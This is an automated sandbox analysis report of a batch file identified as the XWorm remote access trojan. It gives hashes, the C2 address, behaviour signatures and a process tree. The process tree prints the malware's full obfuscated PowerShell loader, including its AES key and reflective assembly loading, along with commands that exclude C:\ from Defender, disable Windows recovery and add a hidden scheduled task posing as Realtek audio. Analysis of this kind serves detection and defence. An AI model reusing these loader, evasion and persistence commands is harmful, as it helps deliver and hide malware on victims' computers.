Overview

overview

10

Static

static

1

fedora.bat

windows7-x64

8

fedora.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/03/2025, 20:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fedora.bat

  • Size

    115KB

  • MD5

    a291659c73e487039ba0d4ed584d2335

  • SHA1

    10b534a148cd151d32bf41fb8674acd5bc98493e

  • SHA256

    3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

  • SHA512

    797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

  • SSDEEP

    3072:4YIEoF2PKuQNG88yD/HSkLhKAYzT6CN512EN2ENuN56E5NC6EEuQ6vgo:BIEUAKuL8jNFziT6CN512EN2ENuN56ES

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.154.98.138:5939

Mutex

iVJRN7HmpQeCP6EU

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fedora.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Temp\fedora.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\SYSTEM32\reagentc.exe
        "reagentc.exe" /disable
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        PID:3744
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5012
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4204
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1552
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4972
            • C:\Windows\SYSTEM32\reagentc.exe
              "reagentc.exe" /disable
              6⤵
              • Drops file in Windows directory
              PID:2808
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2196

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    160B

    MD5

    c2fcef47222d27cce24202f745c7a503

    SHA1

    ec30c3a8b1708660336b623bfb4596fdd8853c81

    SHA256

    2c60c7cf629b03b734768a05676c0d00c1379e022632def98e1eddd071ae3644

    SHA512

    f31383c05bb66920dff87d38a3b3c0237e80eecc5bfd400077846a6a07f6beab4549a62008f7ee065566151071445c4adfcbdf4a7a84a53faa7666c8a6dedff0

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    0e2607058c6330f201b13e13e7f2de7b

    SHA1

    10e9bbd8bc5381f1e77d09928b908095dff3b3d3

    SHA256

    6b77509d9620c5ba376a67fc9cec2892f1baf8f291b1ff0a2c5e29700a056ac7

    SHA512

    7cb0cf1eae96e826074b0dd977a10151d8bac8ead7c771f9c774f0b5c7ea190484a7f2ddf032834464a93620d34bbe750aae3fc47494ce0b534f451bd2f82dda

    Download Submit

  • C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.bat
    Filesize

    115KB

    MD5

    a291659c73e487039ba0d4ed584d2335

    SHA1

    10b534a148cd151d32bf41fb8674acd5bc98493e

    SHA256

    3c482d9f9ba4f4a1ab37d3a0016763eaef87f5e51e259ee92d11e619026531c3

    SHA512

    797c0ab0dc2cf5a5f9012f1426f7766ff7ccf83c287b840254fb7b453d3a79b8cb6d59228cf6ec382cfc4ac6b069714f391efd57008b481a6d247f7da6d09c35

    Download Submit

  • C:\Users\Admin\AppData\Local\Realtek-Hub\3rbgy4tapaz4.vbs
    Filesize

    149B

    MD5

    3f57e0bd4124462e12de6e31d1da4107

    SHA1

    ddb4d4a80e66c89f7d39515ac9a4ab41191bcb9e

    SHA256

    48e10fcfc8d983e9d1bb88603a86acf9655feca56ae4e80e434865fcd809e199

    SHA512

    bdd86d89f94bf489abe817391af573b595433d714ba178dd63f621dcd6523d17035dde996d258f4123304a5f4e36e9b69c4de7b98eedad70d1efa432fe23356d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_paxm1ykj.yjx.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Windows\Logs\ReAgent\ReAgent.log
    Filesize

    2KB

    MD5

    b478f3efc8b26ebcbe4bdae217f2e446

    SHA1

    57a26540f6d4d412523c2cb374f65970511210f9

    SHA256

    c2cc8320e4fd8704adebecc867731b3f2c725b195ce00079ba37f89e68726b21

    SHA512

    10743ae4f96af242864aa084cca5244c8e060941af1e735b4adc2461950399613a33e1650807a028a89b6ff99f724da598a43ccbe7a5ad87dfeb1a2ee4c476f9

    Download Submit

  • C:\Windows\Panther\UnattendGC\diagerr.xml
    Filesize

    11KB

    MD5

    fb4a7c0483f085e58f65cad0b7c04a1a

    SHA1

    c806fc0b2a76b57e711e3ad8948354d188490fa5

    SHA256

    ece65f8c300d778f7b3e5200828321306727fa9ca7658dfcef6f8169ee53654f

    SHA512

    43d64ba9eb57e8f365b1cfd299f26e03bbf2fa18d0a913c75e145582fedfa069af91406de308aa163f95a2f5c03439f26d4923983bf1385b228a6026cd8ae4c5

    Download Submit

  • C:\Windows\Panther\UnattendGC\diagwrn.xml
    Filesize

    12KB

    MD5

    fd9e61785cc147d108f4e911ac3c0568

    SHA1

    25d419cefd72093791f2beb8fc939479c8337771

    SHA256

    ab9ddf44f4ee8dbb76635bd6b17eacfe3074a5c03d6fcb01aedbc70fd25205b5

    SHA512

    0236222c7bed4b86cbff1b739eb1cdaaa71a980b9fd21f0ebdf7b7307de395c0ae8e3ab65fb6ad2ed1fe8cd64a10ff8409980efc3673d037300c46c8b701ebb7

    Download Submit

  • C:\Windows\system32\Recovery\ReAgent.xml
    Filesize

    1KB

    MD5

    44b2da39ceb2c183d5dcd43aa128c2dd

    SHA1

    502723d48caf7bb6e50867685378b28e84999d8a

    SHA256

    894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

    SHA512

    17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

    Download Submit

  • memory/3948-0-0x00007FFF5CDB3000-0x00007FFF5CDB5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3948-6-0x000001BEB19E0000-0x000001BEB1A02000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3948-84-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3948-14-0x000001BEB1A10000-0x000001BEB1A22000-memory.dmp

    Filesize

    72KB

    Download

  • memory/3948-13-0x000001BE99850000-0x000001BE99858000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3948-12-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3948-11-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4748-43-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4748-22-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4748-21-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4748-20-0x00007FFF5CDB0000-0x00007FFF5D871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4972-64-0x00000212AEC20000-0x00000212AEC32000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4972-73-0x00000212B0F40000-0x00000212B0F50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-85-0x00000212B1280000-0x00000212B128C000-memory.dmp

    Filesize

    48KB

    Download